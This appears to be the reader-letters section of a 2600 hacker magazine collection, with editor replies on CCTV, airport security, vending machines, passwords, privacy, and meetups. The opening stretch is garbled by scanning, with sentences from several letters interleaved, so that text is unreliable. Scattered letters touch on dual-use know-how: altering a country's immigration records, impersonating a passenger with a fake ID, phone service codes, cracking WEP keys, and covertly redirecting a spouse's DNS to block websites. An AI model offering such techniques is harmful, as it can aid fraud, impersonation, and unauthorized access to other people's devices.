Son Yes. “ubr”. I always ask people in my business if they read or know what 2600 is. Is there any way that I can enter the Honduran database to alter my date of entry and my port of entry? Thank you for any help that you can give me. In fact. Haven’t gotten it to dispense the soda for free yet . Unplugging the machine and replugging it back in didn’t change anything in the menu. Video images are sometimes stored for the length of time allowed to file a lawsuit against the store. If anyone can do this too. although this deterrence is a side benefit. It could get a little tricky. I guess these are sale counts but there are only nine sodas to choose from . “rbn”. at first installing and later designing and selling CCTV. An “Intellivend 2000” to be precise. The main issue is the store protecting itself from fraudulent “slip and fall” personal injury lawsuits. You have to sell a lot of lettuce to buy a $30. Don’t know what this is. oh yes. Next time. and integration packages. access control. It is no wonder that IT managers cringe when they see us pulling into their parking lots! I want to remark on an editor’s response to a letter by Estragon concerning CCTV systems in supermarkets. Oh. And.10. A year too long. “Thanks to 2600 for doing what you do. The rest were a bunch of different numbers. 0 becomes “back”. and “sale”. And mess with the memories of the people who were supposed to have seen you for the past year.I have to figure this out. Ray So you’d like for us to erase a year off of your stay in Honduras? There’s bound to be a good story in here somewhere and we’d really like to hear it. Reading a book by its cover can be mislead-
243
. and for way too long. We’d probably have to change a second country’s database too. Don’t know what these are. I think that your fine magazine should be mandatory reading for anyone who works in any security field. The reason is not to stop you from shoplifting a steak or some dairy products. write in. I’ve been a reader for so long that I forgot when I started. but if you prevent one fraudulent lawsuit. though. the system has paid for itself many times over. Dear 2600: Hello. 1 becomes “up”. Selecting “eror” gives you “sts” and selecting that gives you “da” one through twelve. This same remark can be applied to many surveillance system installations. I looked around for the same model machine so I could try it on two vending machines. 2 becomes “down”. expensive. assuming you’re actually in that country and aren’t simply asking from somewhere else for some reason.THE HACKER DIGEST . I am visiting Honduras. Thanks for thinking of us. It has a column of nine buttons used for choosing which soda you wish to buy. It always amazes me that my industry “peers” seem to know so little about computer networks and less about network security.
Dear 2600: I read the letter from Vandy. We have a hunch it might be a little more complicated than simply changing dates in one country’s database. Selecting “ubr” displays “67015-6”. as shown on its little red LED display has “eror”. most interesting machines have documentation that would make really good articles if translated from manualspeak. 11. Root menu. Hence. You are nominated. Supermarkets which operate on a notoriously low profit margin are able to win discounts on insurance for having these systems installed. the irony! eddiehaskell Dear 2600: I’ve been wandering around the skyways today and discovered a Coca Cola machine. fire alarm systems. and finishes with.VOLUME 26
Let’s see who’s better. Many “mega-stores” may have 64 or more cameras and four or more DVRs connected to RAID arrays to collect and archive video (to be stored for years in some cases). He continues at length about what we know and don’t know. Selecting “rbn” doesn’t do anything. intrusion. and 12 were all “0001” on the machine that I was looking at. and the answer is almost always no. Selecting “sale” gives you “0002-6655” and selecting that gives you a choice of viewing “sl” one through
Interesting Observations
twelve. I’m going to experiment with holding down buttons and unplugging/plugging it back it in. Large CCTV installations in supermarkets are very common. But we’ve said too much. but I couldn’t find any.000 CCTV system. this is exactly the kind of thing we want to get involved in. and 3 becomes “select”.

I was running late.VOLUME 26
ing. Simply gross incompetence on the part of the security agents.austinhackers. Being a frequent flyer. airports. Imagine my shock when. I didn’t want to complain ( I mean. if you feel like slacking off a bit. Another thing. I brought it up to the man and he said “Oh well. I always streamline my process to avoid hassle. Just thought a view from a different angle might be enlightening. and in hindsight I’m very grateful to be writing this from the return flight. Mr. I’ve been a longtime reader. was my 26:2 issue of 2600. This. I even remember the security agent’s smile to me as he saw me doing a professional check of my body for metal before going through the detector. And I didn’t get the picture in time.org Golden Helix Scary. these stores need this protection to stay in business. and. I do wish I could of helped some way with Kevin back then. It took me about 15 minutes to find it. looking for nonexistent liquids).. by the time I got my bag into the tub for screening. but in many cases. UncleJesus This kind of thing happens all the time and yet we still get charged by stores for “missing” issues as if it were somehow our fault.” So I took it. and a flask (which could conceivably have contained anything) still in my bag. It’s yet another example of how publishers are getting screwed by a monopolistic industry. This frequency rings a bell for me. I must say. I just watched Freedom Downtime and I have been reading The Best of 2600: A Hacker Odyssey. You guys rock. ain’t it? Dear 2600: My subscription lapsed and I went to my local Borders to pick up the newest issue. He then just gave it to me free. I’ve composed numerous articles in my head. and run back through the machine twice as well. The incredibly slow and. Yes.” but honestly. What had fallen out in front of the tub my bag was on? Rolling face up on the conveyor belt towards me. Seriously. but of course this we already knew. rather than a cell. I missed out on so much. You know. 
storing images of shoppers (including me) grates on me.austinhackers. In the example shown here. My bag was deemed suspicious. complete with its “Hacker History” and “Hacker Factor” (yes. and have been flatly disgusted with the current security procedures used by U. the one where cbsm2009 shows how simple it is to subvert airline security. Dear 2600: It appears that some “hackers” play golf but may not in fact be technology enthusiasts! I know the back cover photo is supposed to be something in real life. I discovered an explosive. no sharp objects.. Me Sent from my iHack Dear 2600: I am a new and avid reader. Dear 2600: I heard a news bulletin on BBC Radio 2 state that the British government’s National Pandemic Flu Service website went down after receiving 2600 hits per second. Levi del Valle While you may have missed out on one bit of history through no fault of your own. is not the reason for my apology. Here I was back in high school from 1997 to 2001 just messing around with the computers. Just letting you know. There simply is no reasonable security system in place. although I definitely do penetration testing most every time I fly. but I ran across this site.THE HACKER DIGEST . and couldn’t help but share the URL with the rest of you: http://www. two electrical ignitors. It was stuffed behind a stack of Macworlds. I just wish I had found out about 2600 then. taken out for inspection (twice. no electronics. as we know. remember that what you do now will form the next piece
244
. and might I say you are a breath of fresh air in the stagnating pool of puss that we call the mass media. I have a very strong sense of both civil liberties and security. I would say “keep up the great work.com However. and though this is the first time I’ve actually submitted anything to you. however. There were no liquids. Obviously. What we didn’t know was that the carry-on I used for the first leg of my current flight had not been emptied since July 4th. useless scrutiny of every person’s ID and boarding pass bottlenecked the lines. My carry-on was now in several pieces. if you are/were looking for the other kind of hacker.S. you deserve it. Keep the First Amendment alive. but this was not the case. But here I go rambling on. the motive is purely economic (could even be greed). and here is where my apology comes in. Perhaps one of your readers knows where I might have heard of it before. check out: http://wiki. He tried about 20 times but it just didn’t happen. the old man at the counter couldn’t ring it up. Fossey Dear 2600: I owe you an apology. I took the few they had and put them in the wire cage on the front of the shelf. after arriving at my destination. after these many years of quality. who doesn’t like free stuff) but I thought it harmful to 2600. The Security Department We thank you for showing us a different perspective on this. it was an incredibly irresponsible oversight on my part. I corrected the problem and expected a smooth process through screening. like running Windows in safe mode just to bypass the password login so I could try to get on the Internet and look up some SNES roms and Napster songs. of course (double pun!) the pun was intended)..

if it can be determined how or where this is set. We know a number of people are facing the same predicament as you but there are no immediate solutions. but they are clearly marked with NYPD. I could have snapped a few photos if I had been carrying my camera. or crazy. Please help or refer me to someone who can. I would greatly appreciate your response for this matter as there is no other way really to replace all the files and I put a lot of effort and time into acquiring some and creating others! Thank you very much! Steve There are allegedly companies that specialize in recovering such data but we can’t vouch for them. if those stats even exist. so when security checks the boarding pass and the ID. I run Windows XP SP2 and created a password a few days ago for the flash drive. It would be pretty lame if someone attempted to impersonate a passenger for whatever crazed reasons. So what? Using an assumed name has nothing to do with security. And stealing has always been relatively easy. There is magic in every generation as well as the ability for a single individual to effect significant change. They responded that these things are not possible and that the information is encrypted (password info or my data?). nine characters and I know it for the most part. They actually had a small chainsaw in the glass case! I was surprised at how easy it was to get my e-ticket from the kiosk. The one factor that never seems to disappear is the constant reminder from those in charge that makes us feel as if we have no actual power. And the boarding pass did not have an address on it. This is the flip side of implementing security: you may make things so secure that you lock yourself out. the drive will lock permanently! I didn’t realize I would be limited like that! I believe I would figure it out if I had a number of other attempts available.THE HACKER DIGEST . At worst. Though lame. We think the most promise lies in somehow defeating the limit on password attempts. 
But today (8/21/09). and have even made up a fake ID in the victim’s name. I believe it is in fact possible! Please tell me what all the options are. only the spelling of the names on the boarding pass and ID. If there was any sort of hint question you used on setup. or 4) to retrieve the data.VOLUME 26
of the puzzle. You still would have to go through airport security so it’s not like you’ve defeated anything on that end. JZ If you have all of this information.0 flash drive from mid 2008. Perhaps statistics on passenger impersonation incidents are not high enough to change anything. You can be a key part of that or an important element of something else altogether. we suggest looking at that. I called Sandisk and they said I can select to redo the drive which will allow me to use the drive again but will erase all the data! This is not an option! I asked how I can 1) get a default password. Dear 2600: I recently traveled through the Denver airport. The password is. Of course. it seems you’ve already invested quite a bit of effort into getting someone else’s ticket. I know Sunset Park has cameras near intersections. whereas the helicopter I saw had no markings amongst the black paint. all you would have done is rip someone else off for the price of a ticket that for some reason they never bothered to cancel. Dear 2600: I have a Sandisk Cruzer Micro-USB 2. I did not have to show any ID or anything beyond entering a 13 digit number. I believe. would probably wind up with your little ruse being exposed. they need to mark this as such. remembering a password really
Cries for Help
245
. New York. 2) retrieve my password. but I think it’s just too easy and simple to print out a boarding pass by using a 13 digit number. I saw a black unmarked helicopter mounted with a large surveillance camera underneath the cockpit. unlike in the movies. But nothing could be further from the truth. I need high level support for this situation. nor does it have anything to do with security. I was walking on 5th Avenue and 45th Street in Brooklyn at 1:48 pm when I saw it flying low over the 4th Avenue area. they will not have to compare addresses or faces. But let’s say that you managed to pull it off. It’s been hammered into our heads that we need to be identified and checked at all stages of travel but there’s nothing really convincing in that argument. when walking down an avenue in Brooklyn. there aren’t a lot of exciting or unusual things occurring. not assistance from amateurs. the public needs to be more informed about such matters. it seems fairly easy to impersonate a passenger if one has access to the 13 digit e-ticket number and a fake ID with the name that’s printed on the boarding pass. 3) edit the drive to allow more password attempts. I wish I had taken a photo of a glass case with all of the items that are not permitted onto airplanes by passengers. idiotic. We have no choice but to assume you’re making the whole thing up because you didn’t have one. Dear 2600: Usually. If it was not NYPD. We assume you also would somehow know that the person wasn’t going to show up and cause a big scene which. I tried a few attempts but after four it now says I have one left and if it too is wrong. know exactly where to go. Jason Which is precisely why people should always be carrying a camera. If it was NYPD. There are constant changes going on in the world of technology and in how society handles it all. I didn’t write it down and have now attempted to access it.

Please remove whatever backdoor your members have put on my computer. Years ago. the only two choices I had for my “first issue” were Spring and Summer. I know these keys have some collector value and since they’re not the type of keys I collect.” However. Best of luck in your career as a prosecutor. it’s OK really. I owned a telescope when I was a child and used to see the same kind of color distortions when I screwed my lenses together wrong.. But this actually
General Feedback
246
Dear 2600: Recently, a couple of contributing editors from 2600 the magazine have been hacking my computer. They found out I had Knoppix on my computer. I have hard evidence that I was hacked. I already have proof that one member has already hacked my computer. I won’t say who did it because I need this evidence for a courtroom so I can have an advantage as the prosecutor. If people from your magazine continue to illegally hack my computer, I’ll call the police. I’d really prefer to avoid the police or a confrontation in that way, however. These people need to be taught a lesson. anonymous

We think involving the cops is the best course of action at this point. Sometimes a head-on confrontation is the only way to deal with such matters. Considering we don’t actually have members, it shouldn’t take long at all to get this resolved. When the officers arrive, we’ll be sure to have all of our staffpeople help them figure out what’s really going on. We have an unmanageable staff and this is really the only way to get through to them. So we’ll await the authorities and then lead them to the “member of 2600” that is making your life so miserable.

Dear 2600: I don’t think it’s a writer of the magazine anymore that hacked me. However, the person is a member of 2600 in some way. I did a whois on the domain and couldn’t get an abuse email so I sent it here. It’s that someone is hacking me and opening many windows on my machine and I want it to stop. I don’t like it. anonymous (again)

No. Leaving windows open on a machine is an invitation to burglary and there’s nothing funny about that. After all, it shouldn’t be this big a deal in the first place. If it is, you may just wind up with a really valuable lesson out of all this.

Dear 2600: Hey guys, I was wondering if you can get the master key for a cell phone (Samsung Eternity) or maybe you can tell me where to find it. I found the admin settings, but no success on master key. Please help me. josh

We’re told that the master key setting is “*#3971258*#” or “*#9072641*#” but that could be different for your particular model. The keys to input to get to the admin settings (which you already have) are allegedly “*#3695147*#.” It’s amazing how many people accept the premise that they’re not allowed to have this information, even though it’s for a phone they already own.

Dear 2600: I’m a key collector. I purchased a huge lot of keys on eBay. I was after some other keys in the lot. There were some very interesting keys that caught my eye because I had never seen any like them before. So I kept them. I’ve recently learned these keys are older payphone keys. I’ve been able to identify most of them as “Western Electric,” however, there are some keys I can’t seem to identify the make of phone they belong to. Is there a chance you can help me to identify these other keys and maybe also confirm the others are in fact “Western Electric” as I’ve been told? I can send you pictures of the keys. I want to sell them to help recoup some of the money I spent on the lot and identifying the makers will help me with this. If this is something you can help me with, please let me know and thanks for your time. Jim

You’re best off talking to people who collect either the old phones or some of the same types of keys. You might want to consider asking the folks at Toool (The Open Organization of Lockpickers) who are easily findable on the net. Then going to various hacker or ham radio gatherings, or posting pictures online, would be good ways to share information on this. If there’s a chance these keys still work on existing payphones, you might not want to let too many people in on that. It might be good also to make sure it’s legal to possess these keys. Good luck in your endeavors.

Dear 2600: As much as I want to believe there’s something happening on the moon, what Ethernium57 described in his story is a lens configuration issue and not a clandestine moon base. The “rectangular beams” he describes, however, are quite anomalous. Gary

A call to The Art Bell Show, as he suggested, might clarify that issue.

Dear 2600: I first wish to thank you for the variety of information that you impart in your magazine. 2600, Make, and Hakin9 are my three favorite magazines (in that descending order). I just received my summer issue today and noticed the RENEW! notice on the envelope, so I immediately went online to renew. I did not see a “renew” option. In the end, I suppose, I will have to wait until that changes, so I can have my first issue as the Autumn one and not get a dupe. 3lan

The software we use for our online store exists to make even the simplest things as frustrating and complicated as possible. What you mention is a feature we admittedly should have had from the start. However, since we don’t keep our subscriber database anywhere near a net connection, it’s not possible to access that information remotely. What we can do is add a feature that allows you to input your subscriber coding from your envelope and have us apply the renewal. Hopefully, by the time you read this, we will have that up and running.

Dear 2600: What is the correlation to the two Emmas? Is that really the same tag that was shown on the baby’s shirt in the last issue? Is the “real” operator Emma the grandmother? Fiddles McHace

It’s all in the history books.

Dear 2600: Every issue you go on and on about how hackers are portrayed wrongly and blamed for things they don’t do. I think it is time you admit to yourselves that the word “hacker” has been redefined by society. It is just like how Frisbee started out as a brand of a flying disc and is now the de facto term for a flying disc; no amount of social pressure can change that. You are fighting a losing battle and no amount of education can turn this word back to what we want it to mean. By holding on to the word “hacker,” you are only holding the hacker community back. It’s time for a new term. How about a contest to come up with a new term for us? I’ll start with the lame suggestion of “System Scientist.” tavis

You can make yet another term if you wish but you’re going to face the exact same problems; the negative connotations will still be out there. People have tried to create words like “cracker” and “black hat” to define the more criminal elements in the hacker world. But all this does is give the mass media more words to demonize us with without adding anything constructive. But eventually, those words will always be countered. We find it’s better to stick around and fight for a belief, rather than retreat and concede something as important as a description of who you are. We can, however, use the tarnishing of the word to our advantage if we’re creative. This can and should be a good thing. Or it will be, with enough people. If you were to walk up to someone and admit that you were a “system scientist” or whatever phrase you come up with, we don’t suspect their interest level would last much longer than wondering why you just walked up to them and said that. However, if you said you were a “hacker,” you might see such reactions as panic, envy, disgust, or even hysterical laughter. Now, you have their attention. That is your opportunity to reach them and educate them with what you see as reality. Of course, they may be filled with all sorts of misconceptions and factual inaccuracies and you may find yourself being bombarded with a number of them as a reaction to your proclamation. If you do a good job, you will have dispelled a myth about what hackers stand for. And you may be surprised by how many people already know that the mass media label is inaccurate. After all, in most movies and books, hackers are the good guys and the ones who eventually save the day.

Dear 2600: On the assumption that Dan’s letter was not an exercise in sarcasm, I would like to point out a few problems with the approach of using a sentence as a password. First of all, an entire sentence can have less entropy (the degree to which one character is random compared to the other characters around it) than an eight character pseudo-random password. In other words, while a sentence does make for a longer password, it doesn’t necessarily make for a better one. As they say, it’s not (just) the length that counts. Second, despite the fact that there’s more than one word in the sentence, it is not “bulletproof against dictionary attacks.” After all, any good dictionary attack program has multiple-word attacks. In this case, all of the words are in a dictionary. Approaches like using the first letter of the words in a song lyric have the advantage that the password is easy to remember while still being pseudo-random. A sentence isn’t an example of that. yt

Dear 2600: I love the cover on the Summer 2009 issue. There are so many artifacts represented in it. I was looking for a photo credit and perhaps an indication of where and when it was taken. The reference to the census, which takes place every decade, is at odds with the “Bicentennial Schedule.” Any info that can be shared would be appreciated. Ed Greenberg

While finding out for sure is a bit difficult at the moment, it’s not beyond the realm of possibility that the sign was simply lying around for a few years.

Dear 2600: My wife has this obsession with prisonplanet.tv and infowars.com (the Alex Jones sites). And while some of his stuff makes total sense, I question most of it, including the flip side being our power hungry government! So I’ve had enough of the doom-n-gloom and decided to somehow kill those sites. While my wife was away, I enabled Apache on her Mac and modified her hosts file so that infowars.com and prisonplanet.tv resolved to localhost. I found a cute small orange pirate skull and cross bones jpg and, through some html, had it repeat the image so no matter how she scaled the screen it was plastered in the entire browser window.
It then occurred to me: what if she punched me in the face, took my laptop, and hit those sites? Or what if she gets on her iPhone to check the sites? Our AT&T reception is horrible at home so she jumps on our wi-fi. So I enabled “named” on her Mac and made sure our DHCP server handed out the DNS as her Mac. And I made sure that infowars and prisonplanet resolved to her Mac via some A record additions. She got home, jumped on her Mac, and as she browsed those sites she said “Oh my God, see, the government hacked them!” I left the room, went outside, and laughed hysterically. My advice to anyone wanting to do this: 1. Leave the room before your loved ones open the browser. 2. Put some duct tape over your mouth because my laugh was a dead giveaway. Curious why in Ethernium57’s article “Hacking: An Astronomer’s Perspective,” that while the entire article was awesome, the end was so abrupt and spoke about nonsense FaceBook garbage? I was waiting for what ended up being a wtf! I’m going to pull out my old Celestron and duct tape some lenses together now. Did you guys cover up his article in some way? Perhaps it’s the secret base the elite will hide in during the 2012 planetwide catastrophe? aurfalien

Dear 2600: In the future could you put up some more shirt designs that are more... subtle, like the seal one? Frankly, most of the designs are really not my style; they’re too noisy. S

Your vote for more subtle designs has been received. We’re open to more suggestions as well. There are rumors of a new shirt in the works.

Dear 2600: I wanted to respond to the response from Sigma’s article (“Exploiting Price-Matching through Javascript Injection.”) Some deemed it unwise to print an article that gave explicit instructions on how to exploit a retailer and basically steal money out of its employees’ pockets. I would say that as an employee at Best Buy, I was very grateful for that article.
I was able to recreate Sigma’s method and bring it to my manager’s attention, thus allowing our business to be more aware of the possible exploitation of our policies. Now, aside from the pat on the back I got for bringing this to the company’s attention (thanks Sigma), I am grateful for the articles being published because part of hacking is finding these sources of exploitation, even if it means using some underhanded methods. It is really the only way to find out that there’s a problem and make sure that it doesn’t happen in the future. I’m even grateful that it was tested live in a store because that points out to the company that the management has grown lax in their overriding of price matches. This was not a complex method of theft; I could have done it when I was 12. But without having read that article, I wouldn’t have thought of it. Thanks for the heads up, Sigma. Clay

Dear 2600: This is my response to the rebuttal Michael gave to my article on “Social Engineering to Circumvent the Stock Market.” I’m sorry if I didn’t explain who or what I am. I assumed that was a given. But I believe you missed the point of 2600 Magazine and maybe the true meaning of hacking altogether. Maybe you took the legal disclaimer for granted. (I’ll give you that one.) But I am not a thief, I’m a hacker. Telling a shopkeeper the lock on his door is broken is not a crime, nor ethically wrong. It is the thief who doesn’t tell the shopkeeper their lock is broken who usually comes back and robs the place blind. You might question why I chose to have this published in a hacking magazine versus just, say, calling Wall Street or the oil companies myself. That is because those kinds of calls usually fall on deaf ears. (Thus, “gray hat hacking” was born.) Meanwhile, the system is flawed and open to attack. It is only a matter of time before someone comes along who doesn’t tell the shopkeeper the lock is broken. If people do not know an attack is coming, they are a victim.
But if they were warned an attack is coming that could’ve been prevented and they do nothing about it to fix it, they’re just stupid. I believe we should educate the public and at least give them a chance. I did find it humorous that you really think that the oil market jumping so high in 2008 was all due to demand. True, there are now more people driving in China, but the Soviet Union’s devolution opened up a vast supply of oil which, according to rules of supply and demand, should have dropped the price by flooding the market. But it never did, even before China accepted state capitalism where their driving community took off. Even now, if you keep up on the news, the big oil companies have shut down more and more supply lines of oil for no other reason than the price has dropped. Even at $3.50 a gallon, they admittedly started doing this to try and drive it back up. You said I should have researched this more. I now challenge you to do the same. If the projects you’re referring to in Alberta, Canada are what I think they are, I really don’t care. I assume you’re talking about that project to force underground compression to create oil that would normally take Mother Nature lifetimes. It was only viable if oil prices were high, otherwise production would not meet demand. I really don’t care if your country or my country or whoever becomes the next oil kingpins. There are solutions out there for us to use alternative energy in vehicles that are not only cheaper and cleaner, but faster and better built. I suggest you watch the movie Who Killed The Electric Car? Oh yeah, read the real definition of a “hacker” and “cracker” sometime and stop demonizing people you do not understand.
P.S. 2600, I love you guys but you got to learn to spell my name right. It’s Israel, not Isreal. Israel

Your name was spelled that way because that’s how you spelled it in your initial article submission. Until you told us otherwise, we had to assume that was how you wanted it spelled and so any reference to your article by other letter writers had the proper spelling “corrected” to the one you gave us. Not a whole lot we could do about that.

Dear 2600: Michael asked what the acronym HTH stood for and it was (most likely) incorrectly answered with “helix-turn-helix.” I believe HTH in that context (signed at the end of a message) almost certainly stood for “Happy To Help” or “Hope This Helps.” The acronym HTH being used for this meaning has become a common occurrence on the large SomethingAwful forums, which is probably where the message writer got it from. HTH Ryau

It’s amazing how we somehow managed to miss that, even while signing our own response to the question of what HTH meant with “hope this helps.” It just goes to show that our readers don’t ever miss a trick. Mostly.

Dear 2600: I cannot thank you enough, KES, for your article “Simple how-to on Wireless and Windows Cracking.” Your guide was so easy to follow that I was able to crack a WEP key the very first time I tried with no problems. The only thing I did differently was install the Aircrack-ng suite on my laptop already running Ubuntu 9.04 instead of using the BackTrack distro. I have always wanted to try this but was never really successful. I did notice one small error. In the command where you run airodump-ng, it says “-bssid” but that gave me an error and told me to use “--bssid” instead. After I changed it, it worked like a champ. You also opened my eyes about how insecure WEP really is, so I’m changing my own router to WPA. Thanks again for making this so easy. Happy Hacking! Justin

Dear 2600: I subscribe and I just read the privacy article by 6-Pack. Fantastic and very helpful.
How do I send him or her a snail mail letter? If I send it to you with extra postage, can you forward it? I would never ask you to give out an address, so I must ask your help on this matter. I have a few other questions and I would like to send this person a free copy of a book I wrote. It is the reason why this article is so important to me. My book is titled: James Earl Ray - The Last Days of Inmate # 65477 and I receive death threats every now and then and I have a persistent stalker as well. I would like to send you a copy too. Do I use the Middle Island, NY address on the back of your cover?
Michael Gabriel

You can send us anything at our address. If the writer requests us to forward something reasonable, we will do that as well.

Dear 2600: To 6-Pack: You don’t have to apologize for using the street address of the post office. There is a provision in the U.S. Post Office DMM (Domestic Mail Manual) which provides that one can use a street address plus a box address and that the mail is to be delivered to the address that is immediately above the city and the state. The DMM provision does not prohibit the use of the street address of the post office; it is like any other street address! Therefore, one can legally and properly use the street address of the post office, then the box number you are using, and then the city/state. The DMM is online and you can look up the exact provision for dual address delivery. Further, even if the address is wrong, if the post office employee knows the correct address for delivery, that employee must deliver it to the recipient - regardless of a wrong address on the mail! The post office must deliver the mail to the box number regardless of whatever street address is indicated above the box number. In fact, one could probably use a phony street address and then a legitimate box number and the mail must be delivered to the box number. Those recording addresses will then pick up the phony street address, hopefully! Also of interest, temporary forwarding addresses are not available to marketing companies, only permanent changes of address with the post office. Therefore, one is wise if moving and not wanting the new address to be part of the public record, they put in a “temporary” address for 11 months. Then, after the 11 months, one can then submit another “temporary” address for another 11 months. It works well. Enjoyed your article - well done and thought out. I have been protecting my privacy for years! Always pay your cable, telephone bill, electric, water, etc. with a money order.
These companies record the source of your payments. They have your checking account number, bank, etc. Therefore, pay them with a non-traceable payment. Don’t ever use your credit card, don’t ever use a credit card, don’t ever allow “automatic pay” since it is not only recorded, but hard to contest later. Pay in advance if you must, but be careful how and in what manner you pay these utilities. Your privacy is at stake! Fiducia

Let’s see how many people can send us a secret message in the line before our PO box or simply enter a really funny street address that will never get used. Of course, just because something is supposed to work in a certain way in the post office is no guarantee that it will. But just for the fun

Meeting Stuff

Dear 2600: There used to be a group that met in Birmingham, Alabama, but I have not been able to track them down. Has that group stopped meeting or just changed locations? Is there someone I could contact here in Birmingham for more info? I work for Black & White (www.bwcitypaper.com). It’s an alt-weekly arts/entertainment paper. I’m interested in writing about the group, if it still meets. Michael Craft

We don’t give out contact info for meetings for privacy reasons and also because there is no one person or group that “runs” them. They are gatherings of all sorts of people who follow our basic guidelines and hopefully interact with one another. As we no longer have meetings in your city, we can’t point you to a website or forum where you might be able to speak with someone. However, your letter may inspire someone to try and get something restarted there.

Dear 2600: My first 2600 meeting was a few years ago. It was also my most recent meeting. For the few years that I have read 2600 (I’ve known about it since the BBS days but only recently had access to the print), the meeting pages have stated that the Calgary 2600 meeting is located at the “bland yellow wall” in the Eau Claire market. This was formerly known as the “milk wall” due to advertisements painted on the wall depicting cows wanting you to drink more milk! Now the wall is hidden behind a children’s playground inside the Eau Claire building and, yes, it’s still bland yellow. It is my opinion that this is no longer a suitable place for the meeting due to the lack of seating and general confusion of what the heck the bland yellow wall is for newcomers. I suggest that Calgary hackers in the future meet in the wifi “hotspot” of the Eau Claire market. It’s a sizable space, well advertised, and due to its nature makes more sense for the Calgary hacker community to meet there. Please publish my letter or at least change the meeting arrangements in the meetings section to the above location. The newsstand that I got my copy of the last issue at had at least 20 copies available. According to the guy at the till, people were asking when it would come out a week before the shelf date. Calgary has 2600 readers (wouldn’t it be awesome if that was literal?) but are confused as to where the meeting is. I am the proud owner of The Best Of 2600 and listen to Off The Hook and Off The Wall from my media device as often as the episodes are available. May hackers take over all abandoned nuclear silos! They’ll be in much better use than run down bunkers! patgroove

We have made the suggested change on the condition that every new attendee be told the story of the “milk wall” so that its history may live.

Dear 2600: I am from Vienna, Austria, and for approximately one year I’ve bought your quarterly. After reading some articles and announcements, I was overwhelmed and found myself with the exact feeling I had when I was younger: an exploring, investigating, cryptic, underground feeling and passion. Thank you very much for your magazine! And thanks for your website! I started listening to your first radio session but my iPhone could not download it all (as it downloads only into temporary memory, but is never able to save downloads on the phone itself). If I have time, I’ll download them all onto hard disk. Many years back, I bought some hacker and underground books and packages along with some magazines, but I never had time because of working 10 to 12 hours every day for 13 years! This means I am not as much of a hacker as I’ve always wanted to be. But I do theoretically know what is possible, especially since I’ve spent those 13 years working in IT and telecommunications. Besides this, I’m a member of Linux Firststeps here in Vienna and have contacts with members of quintessenz.org (who organize the annual Big Brother Awards and have podium discussions about data security). In Vienna (according to your meeting listing), we do not have any public hacker meeting. I’m very interested in organizing one. But you have to know that people here in Vienna do represent their own opinion very strictly or rudely which might lead to negative impacts to the discussion partner (me), even later on, e.g. if he/she thinks totally differently as he/she belongs to the “good” side or claims against you in court, even if I only tell theoretically the “bad abilities” of hackers that I know (as practically I don’t know how to do any real hacker stuff).
I want to create an easy, cool, relaxed, and open minded group in which you don’t have to think about what you are allowed to say or not. But you never know the group members, especially new ones, and what they may do afterwards in the meaning of the law. So my question to you is if you have some experiences with such problems. What should I do or how should I behave in such situations? How I can prevent this in advance? My intention first is not to meet personally in a public place, but rather offer an anonymous email, where communication is started first. If I trust somebody, then we can meet on our agreed time and date. This is also never a guarantee not to meet an “enemy,” “spy,” or “intruder” from the “good,” not underground-thinking side. Furthermore, I don’t have time now to meet in person
and later to hold on at exactly the same day of the month. If I have the chance, I go abroad for work. What do you think about this and what is your proposal? Thank you very much in advance! May I also ask, please, what does “2600” mean? Is it a code for a modem connection or dial secret? Richard

What you are describing is not a 2600 meeting by any stretch of the imagination. You seem more interested in meeting fellow cloak-and-dagger subversives while maintaining a busy schedule. That’s all fine and good but it’s not the way our meetings run. It’s completely unacceptable to either meet in a non-public place or to subject someone to an “approval” process. Our meetings are open to all and must be in an easily accessible location. We’re not trying to hide, nor do we believe that anything we’re doing is illegal. That’s not to say that law enforcement won’t take an interest or even that some criminals won’t show up, thinking the meetings are something they’re not. This is why we need calm, level-headed people attending who understand what we’re all about and what we’re not about. Vienna is a very open and accepting place for the most part. We believe a meeting of this sort would do well there. There will always be people who don’t completely agree with certain premises or who are, as you say, strict and rude. We still think the overall atmosphere created at the meetings will be a great benefit in establishing a dialogue and helping a community thrive. As for what “2600” means, this is the question we’re asked more than any other. It’s a reference to 2600 hertz, a frequency that was once used by phone phreaks to seize control of long distance phone lines and gain the ability to route oneself all over the world. Symbolically, we saw it as an expression of independence and rebellion. The rest is history.

Inquiries

Dear 2600: What happened to all the 10-10-XXX long distance prefixes? It seemed at one point, about ten years ago, you couldn’t go a minute without seeing or hearing an annoying ad for one. It seems like they all of a sudden disappeared. Now I don’t know what to do with all those promotional refrigerator magnets.... Mark C.

They do still work but with all of the other means of communicating that are available these days, the seven digit Carrier Access Codes (CACs) don’t get nearly as much attention. Incidentally, the 10-10-XXX format is really a 101XXXX format. Leading zeroes were a part of the newer four digit codes (known as Carrier Identification Codes or CICs) that replaced the old three digit codes (10XXX). So AT&T under the old system was reached by dialing 10288 and now it’s reached by dialing 1010288. It’s hard to imagine the need for 10,000 of these codes throughout the country or that the old limit of 1000 was ever reached. But apparently every small and obscure company in any part of the country was assigned a code and they rapidly filled up, even though the extra digits seemed to serve very little purpose to customers. Perhaps our readers can share some stories on some of the more unique carriers that must be out there somewhere. Also, the question nobody seems to ask is why was it necessary to add the second “one” in the dialing code? 101-XXXX would seemingly work just as well with 10-XXXX since we have yet to find any use of 102, 103, 104, etc. as prefixes. Perhaps they’re actually planning in advance for that dark day when there will be a need for 100,000 different carrier codes. Obviously, it’s a rather silly system that few people even use anymore and that only makes the entire method of dialing a whole lot more cumbersome than it needs to be. Add to that the disaster of area code splits that wound up destroying the geographic representation of phone numbers, and one has to wonder if we should consider just starting over and doing it all properly.

Dear 2600: Any preferred format for articles (is ODF OK)? ternarybit

We prefer ASCII but can read most anything. If it takes longer than a few minutes for us to decipher your format or if it looks completely messed up in the end, we tend to get impatient and move on to the next submission. That’s why we suggest ASCII, which is about as simple as it gets.

Dear 2600: Can you send subscriptions to Havana, Cuba? If so, how? If not, why? Jane Doe

While the various authorities make it as difficult as possible and the odds are higher than normal that our magazine will never arrive, we do honor all subscriptions to Cuba just as we would anywhere else. It can be a trying experience since it’s not exactly easy for someone to even let us know that they didn’t receive their issue. It doesn’t mean we shouldn’t all be trying to get around whatever restrictions exist.

Dear 2600: I was reading your latest issue and there was a letter regarding HTH. You talked about several different possible (but not probable) signatures and ended your response with a “Hope this helps.” You did that on purpose, right? I mean, it should only be logical to me that someone whom another person refers to as “very good at writing code” be helping said person and thus use the “hope this helps” as a signature. Or I could just be crazy. Either way I would also like to know if you could recommend a hacker mentor that I could possibly learn from in Colorado. Thanks for everything. 7shots
